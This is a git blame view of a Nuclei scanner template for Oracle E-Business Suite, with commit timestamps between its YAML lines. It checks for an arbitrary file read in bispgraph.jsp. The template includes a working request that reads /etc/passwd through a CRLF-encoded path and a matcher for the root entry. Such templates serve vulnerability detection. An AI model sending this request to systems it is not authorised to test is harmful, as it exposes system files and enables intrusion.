nuclei-templates/vulnerabilities/oracle-ebs-bispgraph-file-a...

18 lines
394 B
YAML
Raw Normal View History

2020-07-28 15:14:22 +00:00
id: oracle-ebs-bispgrapgh-file-read
2020-07-31 10:02:19 +00:00
info:
2020-07-28 15:14:22 +00:00
name: Oracle EBS Bispgraph File Access
author: "Alfie Njeru (@emenalf) - https://the-infosec.com"
2020-08-31 18:34:29 +00:00
severity: critical
description: todo
2020-07-28 15:14:22 +00:00
requests:
- method: GET
2020-07-31 10:02:19 +00:00
path:
2020-07-28 15:14:22 +00:00
- "{{BaseURL}}/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/"
2020-07-31 10:02:19 +00:00
matchers:
2020-07-28 15:14:22 +00:00
- type: regex
regex:
- "root:[x*]:0:0:"
part: body